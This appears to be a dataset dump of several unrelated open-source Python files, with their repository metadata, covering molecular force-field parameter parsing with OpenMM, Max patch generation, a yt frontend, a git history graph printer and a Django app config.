    if x.get_shape().ndims != 0:
      raise ValueError("%s.ndims=%d is not 0 (scalar)" %
                       (x.name, x.get_shape().ndims))
    if x_value_static < 0:
      raise ValueError("%s.value=%d cannot be negative" %
                       (x.name, x_value_static))
    return x
  if self.validate_args:
    # Dynamic path: attach runtime checks (rank 0, non-negative) only when
    # the caller asked for argument validation.
    x = control_flow_ops.with_dependencies([
        check_ops.assert_rank(x, 0),
        check_ops.assert_non_negative(x)], x)
  return x
def _introspect_ndims(self, ndims):
  """Helper to establish some properties of input ndims args.

  Args:
    ndims: scalar `Tensor` (int32) number of dimensions.

  Returns:
    A tuple `(static_ndims, is_zero)`: `static_ndims` is the Python integer
    value of `ndims` when statically known, else `None`; `is_zero` is a
    Python bool in the static case, otherwise a boolean `Tensor`.
  """
  if self._is_all_constant_helper(ndims):
    # Evaluate the constant once instead of calling constant_value twice.
    ndims_static = tensor_util.constant_value(ndims)
    return ndims_static, ndims_static == 0
  return None, math_ops.equal(ndims, 0)
| 40.223404 | 80 | 0.645332 |
795bcdc2d69298c7e5b47a60b5ae84cb4492124d | 6,455 | py | Python | QUBEKit/parametrisation/xml_protein.py | cole-group/QUBEK | 50f8a9c06396f2222a6fe058bf764a6bd7021e38 | [
"MIT"
] | 14 | 2018-10-19T12:32:39.000Z | 2022-01-07T05:06:06.000Z | QUBEKit/parametrisation/xml_protein.py | cole-group/QUBEK | 50f8a9c06396f2222a6fe058bf764a6bd7021e38 | [
"MIT"
] | null | null | null | QUBEKit/parametrisation/xml_protein.py | cole-group/QUBEK | 50f8a9c06396f2222a6fe058bf764a6bd7021e38 | [
"MIT"
] | 6 | 2019-02-26T13:32:58.000Z | 2021-06-01T15:11:27.000Z | #!/usr/bin/env python3
from QUBEKit.parametrisation.base_parametrisation import Parametrisation
from QUBEKit.utils.decorators import for_all_methods, timer_logger
from collections import OrderedDict
from copy import deepcopy
from simtk.openmm import app, XmlSerializer
import xml.etree.ElementTree as ET
@for_all_methods(timer_logger)
class XMLProtein(Parametrisation):
    """Read in the parameters for a protein from the QUBEKit_general XML file and store them into the protein.

    Construction builds an OpenMM system from the protein's PDB plus the XML
    force field, serialises it to 'serialised.xml', then parses that file to
    populate the molecule's parameter containers (AtomTypes,
    HarmonicBondForce, HarmonicAngleForce, NonbondedForce,
    PeriodicTorsionForce).
    """

    def __init__(self, protein, input_file='QUBE_general_pi.xml', fftype='CM1A/OPLS'):
        # protein: the protein object to parametrise (exposed as self.molecule
        #   by the Parametrisation base class).
        # input_file: XML force-field file used to build the OpenMM system.
        # fftype: force-field type label recorded on the molecule.
        super().__init__(protein, input_file, fftype)
        # Fall back to '<name>.xml' when no input file was supplied.
        self.xml = self.input_file if self.input_file else f'{self.molecule.name}.xml'
        self.serialise_system()
        self.gather_parameters()
        self.molecule.parameter_engine = f'XML input {self.fftype}'
        self.molecule.combination = 'opls'

    def serialise_system(self):
        """Serialise the input XML system using openmm.

        Reads '<name>.pdb', builds a system with no cutoff and no
        constraints, and writes the serialised system to 'serialised.xml'
        (side effect: file written in the working directory).
        """
        pdb = app.PDBFile(f'{self.molecule.name}.pdb')
        modeller = app.Modeller(pdb.topology, pdb.positions)
        forcefield = app.ForceField(self.xml)
        system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.NoCutoff, constraints=None)
        xml = XmlSerializer.serializeSystem(system)
        with open('serialised.xml', 'w+') as out:
            out.write(xml)

    def gather_parameters(self):
        """
        This method parses the serialised xml file and collects the parameters ready to pass them
        to build tree.
        """
        # Try to gather the AtomTypes first
        for atom in self.molecule.atoms:
            self.molecule.AtomTypes[atom.atom_index] = [atom.atom_name, f'QUBE_{atom.atom_index}', atom.atom_name]

        input_xml_file = 'serialised.xml'
        in_root = ET.parse(input_xml_file).getroot()

        # Extract all bond data: keyed on the (p1, p2) atom-index pair.
        for Bond in in_root.iter('Bond'):
            self.molecule.HarmonicBondForce[(int(Bond.get('p1')), int(Bond.get('p2')))] = [Bond.get('d'), Bond.get('k')]

        # before we continue update the protein class
        self.molecule.update()

        # Extract all angle data: keyed on the (p1, p2, p3) atom-index triple.
        for Angle in in_root.iter('Angle'):
            self.molecule.HarmonicAngleForce[int(Angle.get('p1')), int(Angle.get('p2')), int(Angle.get('p3'))] = [
                Angle.get('a'), Angle.get('k')]

        # Extract all non-bonded data: charge, sigma, epsilon per particle.
        # Particles without an 'eps' attribute (e.g. virtual sites) are skipped.
        i = 0
        for Atom in in_root.iter('Particle'):
            if "eps" in Atom.attrib:
                self.molecule.NonbondedForce[i] = [float(Atom.get('q')), float(Atom.get('sig')), float(Atom.get('eps'))]
                self.molecule.atoms[i].partial_charge = float(Atom.get('q'))
                i += 1

        # Extract all of the torsion data.
        # phases[n-1] is the phase assumed for periodicity n (alternating 0/pi).
        phases = ['0', '3.141592653589793', '0', '3.141592653589793']
        for Torsion in in_root.iter('Torsion'):
            tor_string_forward = tuple(int(Torsion.get(f'p{i}')) for i in range(1, 5))
            tor_string_back = tuple(reversed(tor_string_forward))
            # Store each torsion once, appending extra periodicity terms to
            # whichever orientation (forward or reversed) was seen first.
            if tor_string_forward not in self.molecule.PeriodicTorsionForce and tor_string_back not in self.molecule.PeriodicTorsionForce:
                self.molecule.PeriodicTorsionForce[tor_string_forward] = [
                    [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]]]
            elif tor_string_forward in self.molecule.PeriodicTorsionForce:
                self.molecule.PeriodicTorsionForce[tor_string_forward].append(
                    [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]])
            elif tor_string_back in self.molecule.PeriodicTorsionForce:
                self.molecule.PeriodicTorsionForce[tor_string_back].append(
                    [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]])

        # Now we have all of the torsions from the OpenMM system
        # we should check if any torsions we found in the molecule do not have parameters
        # if they don't give them the default 0 parameter this will not change the energy
        for tor_list in self.molecule.dihedrals.values():
            for torsion in tor_list:
                # change the indexing to check if they match
                if torsion not in self.molecule.PeriodicTorsionForce and tuple(
                        reversed(torsion)) not in self.molecule.PeriodicTorsionForce:
                    self.molecule.PeriodicTorsionForce[torsion] = [['1', '0', '0'], ['2', '0', '3.141592653589793'],
                                                                   ['3', '0', '0'], ['4', '0', '3.141592653589793']]

        # Now we need to fill in all blank phases of the Torsions so every
        # torsion carries exactly four periodicity terms (V1..V4).
        for key, val in self.molecule.PeriodicTorsionForce.items():
            vns = ['1', '2', '3', '4']
            if len(val) < 4:
                # now need to add the missing terms from the torsion force
                for force in val:
                    vns.remove(force[0])
                for i in vns:
                    val.append([i, '0', phases[int(i) - 1]])

        # sort by periodicity using lambda function
        for force in self.molecule.PeriodicTorsionForce.values():
            force.sort(key=lambda x: x[0])

        # now we need to tag the proper and improper torsions and reorder them so the first atom is the central
        improper_torsions = OrderedDict()
        for improper in self.molecule.improper_torsions:
            for key, val in self.molecule.PeriodicTorsionForce.items():
                # for each improper find the corresponding torsion parameters and save
                if sorted(key) == sorted(improper):
                    # if they match tag the dihedral
                    self.molecule.PeriodicTorsionForce[key].append('Improper')
                    # replace the key with the strict improper order first atom is center
                    improper_torsions[improper] = val

        torsions = deepcopy(self.molecule.PeriodicTorsionForce)
        # now we should remake the torsion store in the ligand: keep only the
        # proper torsions (entries not tagged 'Improper') in their original order
        self.molecule.PeriodicTorsionForce = OrderedDict((v, k) for v, k in torsions.items() if k[-1] != 'Improper')
        # now we need to add the impropers at the end of the torsion object
        for key, val in improper_torsions.items():
            self.molecule.PeriodicTorsionForce[key] = val
795bcded1ff62164a683c5d5ecd8c628bb597bb1 | 698 | py | Python | scripts/dump_registry.py | shakfu/py2max | c88c80510ca7ca1bd13314cbf8ccfe57d788fec0 | [
"Unlicense"
] | 1 | 2021-07-24T09:18:19.000Z | 2021-07-24T09:18:19.000Z | scripts/dump_registry.py | shakfu/py2max | c88c80510ca7ca1bd13314cbf8ccfe57d788fec0 | [
"Unlicense"
] | null | null | null | scripts/dump_registry.py | shakfu/py2max | c88c80510ca7ca1bd13314cbf8ccfe57d788fec0 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
import os
import sys
from pathlib import Path
#sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
from py2max import Patcher
from py2max.registry import objects
def chunks(lst, n):
    """Yield successive n-sized chunks from lst.

    The final chunk is shorter than ``n`` when ``len(lst)`` is not an exact
    multiple of ``n``.
    """
    offsets = range(0, len(lst), n)
    for offset in offsets:
        yield lst[offset:offset + n]
def dump_registry(to_folder, size=20):
    """Write every registered object name into Max patch files under *to_folder*.

    Names are taken in pages of *size*; page ``i`` becomes
    ``<to_folder>/<i>.maxpat`` containing one textbox per name.
    """
    os.makedirs(to_folder, exist_ok=True)
    names = list(objects.keys())
    for page, group in enumerate(chunks(names, size)):
        patcher = Patcher(f'{to_folder}/{page}.maxpat')
        for name in group:
            patcher.add_textbox(name)
        patcher.save()
if __name__ == '__main__':
    # Script entry point: dump the full object registry in pages of 20.
    dump_registry(to_folder='outputs/registry', size=20)
| 23.266667 | 63 | 0.648997 |
795bcf198c00bec109c3e24ca768de5c5f32e578 | 286 | py | Python | yt_aspect/__init__.py | chrishavlin/yt_aspect | 01173da347fcef4abf201f2da3c8233b37f23892 | [
"MIT"
] | 1 | 2021-12-10T20:39:13.000Z | 2021-12-10T20:39:13.000Z | yt_aspect/__init__.py | data-exp-lab/yt_aspect | 01173da347fcef4abf201f2da3c8233b37f23892 | [
"MIT"
] | 6 | 2021-09-07T19:54:16.000Z | 2021-09-16T20:18:51.000Z | yt_aspect/__init__.py | chrishavlin/yt_aspect | 01173da347fcef4abf201f2da3c8233b37f23892 | [
"MIT"
] | 1 | 2021-09-15T21:55:57.000Z | 2021-09-15T21:55:57.000Z | from .data_structures import ASPECTDataset # noqa: F401
from .data_structures import ASPECTUnstructuredIndex # noqa: F401
from .data_structures import ASPECTUnstructuredMesh # noqa: F401
from .fields import ASPECTFieldInfo # noqa: F401
from .io import IOHandlerASPECT # noqa: F401
| 47.666667 | 66 | 0.807692 |
795bcf1abe937a74908e4b0036f61b9e21fe175c | 1,695 | py | Python | src/githistorian/graph.py | drachlyznardh/git-historian | f3691c47d26e65aff25f29283ef3b940de0d2697 | [
"MIT"
] | null | null | null | src/githistorian/graph.py | drachlyznardh/git-historian | f3691c47d26e65aff25f29283ef3b940de0d2697 | [
"MIT"
] | 2 | 2018-08-11T09:17:14.000Z | 2018-08-11T09:18:12.000Z | src/githistorian/graph.py | drachlyznardh/git-historian | f3691c47d26e65aff25f29283ef3b940de0d2697 | [
"MIT"
] | null | null | null | # encoding: utf-8
from __future__ import print_function
# Silencing BROKEN PIPE errors
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
from .row import unroll as row_unroll
from .column import unroll as column_unroll
from .layout import Layout
class VisitOrder:
def __init__ (self):
self.content = []
def push (self, arg):
if len(arg) == 0: return
for e in reversed(arg):
self.content.insert(0, e)
def is_empty (self):
return len(self.content) == 0
def has_more (self):
return len(self.content)
def pop (self):
try: return self.content.pop(0)
except: return None
def _bind_children (heads, db):
order = VisitOrder()
order.push(heads)
while order.has_more():
name = order.pop()
commit = db.at(name)
if commit.done: continue
for i in commit.parent:
db.at(i).add_child(name)
order.push(db.skip_if_done(commit.parent))
commit.done = 1
def _print_graph (history, first, width, hflip, vflip):
t = Layout(width + 1, hflip, vflip)
name = first
bigblock = []
while name:
node = history.at(name)
transition, padding = t.compute_layout(node)
block = ['\x1b[m%s\x1b[m %s' % (transition, node.message[0])]
for i in node.message[1:]: block.append('\x1b[m%s\x1b[m %s' % (padding, i))
if vflip: bigblock.append('\n'.join(block))
else: print('\n'.join(block))
name = node.bottom
if vflip:
bigblock.reverse()
print('\n'.join(bigblock))
def deploy (opt, roots, history):
_bind_children(roots, history)
history.clear()
first = row_unroll(roots, history, opt.mingle, opt.flip)
history.clear()
width = column_unroll(roots, history, opt.flip)
_print_graph(history, first, width, opt.hflip, opt.vflip)
| 20.421687 | 77 | 0.692625 |
795bcf64980177bf468906c238b796354923fd42 | 141 | py | Python | passwordmanager/apps.py | percevalm/aumyproject | b24b38005188ce9dd41ed663cf54dad5464afef3 | [
"bzip2-1.0.6"
] | null | null | null | passwordmanager/apps.py | percevalm/aumyproject | b24b38005188ce9dd41ed663cf54dad5464afef3 | [
"bzip2-1.0.6"
] | 16 | 2020-03-24T17:30:37.000Z | 2022-03-11T23:57:41.000Z | passwordmanager/apps.py | percevalm/aumyproject | b24b38005188ce9dd41ed663cf54dad5464afef3 | [
"bzip2-1.0.6"
] | null | null | null | from django.apps import AppConfig
class PasswordmanagerConfig(AppConfig):
    """Django application configuration for the password manager app."""

    # App label used by Django's app registry.
    name = 'passwordmanager'
    # Human-readable name shown e.g. in the admin (fixed PEP 8 spacing).
    verbose_name = 'Password Manager'
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.